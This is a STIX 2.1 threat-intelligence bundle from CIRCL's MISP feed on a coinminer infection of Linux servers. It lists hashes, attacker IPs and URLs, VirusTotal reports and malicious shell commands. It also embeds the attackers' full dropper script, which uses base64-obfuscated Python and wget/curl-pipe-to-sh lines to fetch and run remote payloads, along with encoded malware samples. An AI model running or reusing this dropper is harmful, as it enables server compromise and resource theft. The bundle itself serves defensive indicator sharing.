misp-circl-feed/feeds/circl/stix-2.1/5cf22f74-759c-4744-90eb-4300950d210f.json

927 lines
703 KiB
JSON
Raw Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5cf22f74-759c-4744-90eb-4300950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:26:08.000Z",
"modified": "2019-06-01T09:26:08.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5cf22f74-759c-4744-90eb-4300950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:26:08.000Z",
"modified": "2019-06-01T09:26:08.000Z",
"name": "Linux server infection with coinminers (derived from original post with iptables rules)",
"published": "2019-06-01T09:26:35Z",
"object_refs": [
"indicator--5cf22f90-03e4-42e8-ad21-46e2950d210f",
"indicator--5cf23560-1a54-4bd1-b253-4cbc950d210f",
"indicator--5cf23658-5858-45ec-bd98-437b950d210f",
"observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f",
"file--5cf2421b-bba0-4844-8d28-43c9950d210f",
"artifact--5cf2421b-bba0-4844-8d28-43c9950d210f",
"indicator--5cf22fbc-cecc-465b-a261-4385950d210f",
"indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8",
"x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734",
"x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f",
"indicator--bd7566b3-8da1-4830-9ee4-2d705598919f",
"x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7",
"x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f",
"malware--5cf236e8-c18c-45ff-852e-4be0950d210f",
"indicator--5cf23717-673c-48de-9834-476d950d210f",
"indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f",
"malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f",
"indicator--5cf238a2-0e5c-447e-a584-4072950d210f",
"indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f",
"indicator--5cf23a31-1db8-4b41-81af-4416950d210f",
"indicator--5cf23ef7-5138-4a1f-b773-4766950d210f",
"indicator--5cf23fe9-25c8-47df-a38a-4325950d210f",
"indicator--5cf24083-6de0-42e3-9ae7-4129950d210f",
"indicator--5cf240b4-352c-40a3-8aba-40b5950d210f",
"x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f",
"x-misp-object--5cf24424-33b4-488b-8202-4db5950d210f",
2023-12-14 14:30:15 +00:00
"relationship--f5b7e7ab-0b50-4285-ac22-baa90eafe67c",
"relationship--60ac44d9-d531-45b1-8a21-5f140e87475b",
"relationship--55d8e5a8-d2fd-4f7e-85ae-eec938dd410d",
"relationship--00d63c2c-7766-4631-b4fc-f6ee684f8368",
"relationship--1a6cb2e6-bfdb-4e77-b5c7-a6ead29e34a8",
"relationship--40b561d5-1976-4f05-9e7a-499673ffd659",
"relationship--738f0138-0374-45b7-8664-00085370a299",
"relationship--6496c0e0-204b-4b7a-83c0-37b8e4d766fa",
"relationship--5e50743c-8193-4cbb-a7e5-84019278877f",
"relationship--51506d5e-74d1-4cc9-88a3-aaebf0ba002f",
"relationship--b7090b3e-332a-4674-9057-ed0e4c8f85fd",
"relationship--bab30b8c-f1b5-4fff-b7f5-36a20a0bd247",
"relationship--77c6b2dd-eed7-4784-8e1f-22ee4a978e57",
"relationship--81b16a52-9808-4b78-abbb-6255ed8ad8ee"
2023-04-21 14:44:17 +00:00
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"osint:certainty=\"50\"",
"misp-galaxy:malpedia=\"Coinminer\"",
"misp-galaxy:tool=\"CoinMiner\"",
"misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"",
"misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf22f90-03e4-42e8-ad21-46e2950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T07:56:00.000Z",
"modified": "2019-06-01T07:56:00.000Z",
"description": "Coinminer",
"pattern": "[file:hashes.MD5 = '2cb968c8d33d89af2ec03df8fd875ab6']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T07:56:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf23560-1a54-4bd1-b253-4cbc950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:20:48.000Z",
"modified": "2019-06-01T08:20:48.000Z",
"description": "Coinminer",
"pattern": "[file:hashes.SHA256 = '0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:20:48Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf23658-5858-45ec-bd98-437b950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:24:56.000Z",
"modified": "2019-06-01T08:24:56.000Z",
"pattern": "[url:value = 'http://165.227.140.184/tmp/nww']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:24:56Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T09:15:07.000Z",
"modified": "2019-06-01T09:15:07.000Z",
"first_observed": "2019-06-01T09:15:07Z",
"last_observed": "2019-06-01T09:15:07Z",
"number_observed": 1,
"object_refs": [
"file--5cf2421b-bba0-4844-8d28-43c9950d210f",
"artifact--5cf2421b-bba0-4844-8d28-43c9950d210f"
],
"labels": [
"misp:type=\"attachment\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5cf2421b-bba0-4844-8d28-43c9950d210f",
"name": "liu.png",
"content_ref": "artifact--5cf2421b-bba0-4844-8d28-43c9950d210f"
},
{
"type": "artifact",
"spec_version": "2.1",
"id": "artifact--5cf2421b-bba0-4844-8d28-43c9950d210f",
"payload_bin": "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
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf22fbc-cecc-465b-a261-4385950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T07:56:44.000Z",
"modified": "2019-06-01T07:56:44.000Z",
"pattern": "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '165.227.140.184') AND network-traffic:dst_port = '80']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T07:56:44Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"ip-port\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:19:23.000Z",
"modified": "2019-06-01T08:19:23.000Z",
"pattern": "[file:hashes.MD5 = '2cb968c8d33d89af2ec03df8fd875ab6' AND file:hashes.SHA1 = '535fd49cf76e48d610f2e80d0ce16d722ba6b949' AND file:hashes.SHA256 = '7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:19:23Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T07:57:37.000Z",
"modified": "2019-06-01T07:57:37.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-02-25T10:14:54",
"category": "Other",
"comment": "Coinminer",
"uuid": "ab588995-f90a-4487-8efd-ec53c6e3fdfd"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805/analysis/1551089694/",
"category": "External analysis",
"comment": "Coinminer",
"uuid": "dc266a97-294a-48dd-9ea8-4e2d3ec4f8e4"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "6/53",
"category": "Artifacts dropped",
"comment": "Coinminer",
"uuid": "c278894e-a2a2-40aa-8ae3-ec6d45acc2e9"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:18:46.000Z",
"modified": "2019-06-01T08:18:46.000Z",
"labels": [
"misp:name=\"shell-commands\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "language",
"value": "Bash",
"category": "Other",
"uuid": "5cf234e6-4da8-49b5-b064-4e40950d210f"
},
{
"type": "text",
"object_relation": "state",
"value": "Malicious",
"category": "Other",
"uuid": "5cf234e6-ee88-4671-90c3-4ee5950d210f"
},
{
"type": "text",
"object_relation": "shell-command",
"value": "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed",
"category": "Other",
"uuid": "5cf234e6-c614-47da-a863-46e8950d210f"
},
{
"type": "text",
"object_relation": "shell-command",
"value": "sh -c /var/tmp/sde ryuf",
"category": "Other",
"uuid": "5cf234e6-9c48-4372-bab4-42b0950d210f"
},
{
"type": "text",
"object_relation": "shell-command",
"value": "sh -c /tmp/sde ryuf",
"category": "Other",
"uuid": "5cf234e6-abec-4654-a935-4354950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "shell-commands"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:24:11.000Z",
"modified": "2019-06-01T08:24:11.000Z",
"pattern": "[file:hashes.MD5 = '3694010708de4a2c916e34cbe2a0ed60' AND file:hashes.SHA1 = '6faf93653c6f64d7aa814c878fed112a6db992f6' AND file:hashes.SHA256 = '0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-06-01T08:24:11Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:20:59.000Z",
"modified": "2019-06-01T08:20:59.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-02-10T19:49:48",
"category": "Other",
"comment": "Coinminer",
"uuid": "266fe354-b65d-425a-9c9e-3544e0c5a9f1"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72/analysis/1549828188/",
"category": "External analysis",
"comment": "Coinminer",
"uuid": "e4df3142-d2dd-48ed-81d8-dada676b54e3"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "1/58",
"category": "Artifacts dropped",
"comment": "Coinminer",
"uuid": "a64f16e1-a212-4a8f-ba03-dbc5fed0c2bd"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:23:21.000Z",
"modified": "2019-06-01T08:23:21.000Z",
"labels": [
"misp:name=\"shell-commands\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "language",
"value": "Bash",
"category": "Other",
"uuid": "5cf235f9-bef4-4265-ad47-48c2950d210f"
},
{
"type": "text",
"object_relation": "state",
"value": "Malicious",
"category": "Other",
"uuid": "5cf235f9-9bfc-4e50-9433-44d2950d210f"
},
{
"type": "text",
"object_relation": "shell-command",
"value": "atd",
"category": "Other",
"uuid": "5cf235f9-a640-4b3b-8627-4592950d210f"
},
{
"type": "text",
"object_relation": "shell-command",
"value": "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed",
"category": "Other",
"uuid": "5cf235f9-91cc-411f-8124-4241950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "shell-commands"
},
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--5cf236e8-c18c-45ff-852e-4be0950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:42:17.000Z",
"modified": "2019-06-01T08:42:17.000Z",
"is_family": false,
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "misc"
}
],
"implementation_languages": [
"Bash"
],
"labels": [
"misp:name=\"script\"",
"misp:meta-category=\"misc\"",
"misp:to_ids=\"False\""
],
"x_misp_script": "#!/bin/sh\r\nif ! ps -ax | grep -v grep | grep \"[ ]\"$ >/dev/null; then\r\n\t nohup python -c 'import os,urllib; proxies = {\"http\": \"http://41.203.146.142:8080\"};f=open(\"/tmp/hsos\",\"wb\");f.write(urllib.urlopen(\"http://165.227.140.184/tmp/ofd\",proxies=proxies\r\n).read());f.close();os.system(\"chmod +x /tmp/hsos\");os.system(\"chmod 777 /tmp/hsos\");os.system(\"/tmp/hsos\")' &\r\n\t sleep 3\r\n\t nohup python3 -c 'import urllib.request; urllib.request.urlretrieve(\"http://165.227.140.184/tmp/ofd\", \"/tmp/vov\");os.system(\"chmod 7777 /tmp/vov\");os.system(\"chmod +x /tmp/vov\");os\r\n.system(\"/tmp/vov\")' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTsgbD1iaW5hc2NpaS5iMmFfaGV4KG9zLnVyYW5kb20oNCkpOyBoZD11cmxsaWIudXJscmV0cmlldmUgKCJodHRwOi8vODcuMjM2LjIxMi4yMzcvdG1wL29mZCIsI\r\nCIvdG1wLyIrbCk7b3Muc3lzdGVtKCJjaG1vZCA3Nzc3IC90bXAvIitsKTtvcy5zeXN0ZW0oImNobW9kICt4IC90bXAvIitsKTsgb3Muc3lzdGVtKCIvdG1wLyIrbCk=\".decode(\"base64\"))' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTtsPWJpbmFzY2lpLmIyYV9oZXgob3MudXJhbmRvbSg0KSk7aD1vcy5wYXRoLmV4cGFuZHVzZXIoIn4vIitsKTtwcm94aWVzPXsiaHR0cCI6Imh0dHA6Ly8yMTEuM\r\njQuMTAzLjIyODo4MCJ9O2Y9b3BlbihoLCJ3YiIpO2Yud3JpdGUodXJsbGliLnVybG9wZW4oImh0dHA6Ly84Ny4yMzYuMjEyLjIzNy90bXAvb2ZkIixwcm94aWVzPXByb3hpZXMpLnJlYWQoKSk7Zi5jbG9zZSgpO29zLnN5c3RlbSgiY2htb2QgNzc3NyB\r\n7fSIuZm9ybWF0KGgpKTtvcy5zeXN0ZW0oImNobW9kICt4IHt9Ii5mb3JtYXQoaCkpOyBvcy5zeXN0ZW0oInt9ICYiLmZvcm1hdChoKSk=\".decode(\"base64\"))' 2>&1\r\n\t wget -O - http://185.165.169.6/jp/_j.sh|sh ; curl http://185.165.169.6/jp/_j.jpg|sh\r\nfi",
"x_misp_state": "Malicious"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cf23717-673c-48de-9834-476d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-06-01T08:28:07.000Z",
"modified": "2019-06-01T08:28:07.000Z",
"pattern": "[file:hashes.MD5 = '9f189f26da1206151ce39e5aab269ff6' AND file:hashes.SHA1 = '4ee5040af71f5fd8080f0f0bed2672bc1f68d1e1' AND file:hashes.SHA256 = '1fc77ceb1ffad48a067c9c83bc1c5347e4b359b4520859b91fc14fedc29a8803' AND file:name = 'ofd' AND file:size = '56392' AND (file:content_ref.payload_bin = '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